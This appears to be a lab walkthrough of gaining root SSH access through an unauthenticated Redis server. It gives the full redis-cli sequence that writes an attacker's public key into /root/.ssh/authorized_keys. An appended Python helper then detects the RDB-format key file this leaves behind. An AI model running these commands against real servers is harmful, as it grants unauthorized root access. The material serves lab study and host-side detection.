Environment setup
Target machine: CentOS 7, 172.16.12.2
Redis service running on port 6379
Local machine with the redis-cli client installed
Connection test
redis-cli -h 172.16.12.2
Exploitation method: writing the local public key
Generate the local public key
ssh-keygen -t rsa
Write the public key into Redis
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt
cat /tmp/foo.txt | /usr/redis/redis-cli -h 172.16.12.2 -p 6379 -x set crackit
Connect to Redis and write the key to the target
redis-cli -h 172.16.12.2
keys *
config set dir /root/.ssh
config get dir
config set dbfilename "authorized_keys"
save
exit
Connect to the target
Because a passphrase was set on the key, enter 123456
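
Host-side check for the artifact this procedure leaves behind (an added example, not part of the original notes): because `save` writes a full RDB snapshot, the resulting authorized_keys starts with the "REDIS" magic and carries binary lines around the newline-padded key. The function name and the sample bytes are constructed for illustration.

```python
import re

# An RDB snapshot opens with ASCII "REDIS" plus a 4-digit format version.
RDB_MAGIC = re.compile(rb"REDIS\d{4}")
# Key type, base64 blob, optional comment; key options may precede the type.
KEY = re.compile(
    rb"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+) ([A-Za-z0-9+/]+=*)(?: (.*))?")

def _is_text(line: bytes) -> bool:
    """True if the line is valid UTF-8 with no control bytes other than tab."""
    try:
        return line.decode("utf-8").replace("\t", " ").isprintable()
    except UnicodeDecodeError:
        return False

def inspect_authorized_keys(data: bytes) -> dict:
    """Hypothetical helper: flag an authorized_keys file that looks like an RDB dump."""
    keys, binary_lines = [], 0
    for raw in data.split(b"\n"):
        line = raw.rstrip(b"\r")
        if not line.strip():
            continue                      # blank padding lines
        if not _is_text(line):
            binary_lines += 1             # RDB header, key metadata, checksum
            continue
        m = KEY.search(line)
        if m:
            keys.append((m.group(1).decode(), (m.group(3) or b"").decode()))
    rdb_magic = RDB_MAGIC.match(data) is not None
    return {"rdb_magic": rdb_magic, "binary_lines": binary_lines,
            "keys": keys, "suspicious": rdb_magic or binary_lines > 0}

# Constructed samples: the key blob is a placeholder, not a real key.
SAMPLE_KEY = b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCexampleexample user@example.invalid"
SAMPLE_DUMP = (b"REDIS0009\xfa\x09redis-ver\x055.0.0\xfe\x00\xfb\x01\x00\x00\x07crackit\x40\x50"
               b"\n\n" + SAMPLE_KEY + b"\n\n\n\xff\x01\x02\x03\x04\x05\x06\x07\x08")
SAMPLE_CLEAN = b"# managed by ops (constructed)\n" + b'from="10.0.0.0/8" ' + SAMPLE_KEY + b"\n"

if __name__ == "__main__":
    for name, blob in (("dump", SAMPLE_DUMP), ("clean", SAMPLE_CLEAN)):
        print(name, inspect_authorized_keys(blob))
```

On a real host, pass the bytes of each account's ~/.ssh/authorized_keys; any result with "suspicious" set warrants checking the Redis instance's `dir` and `dbfilename` settings as well.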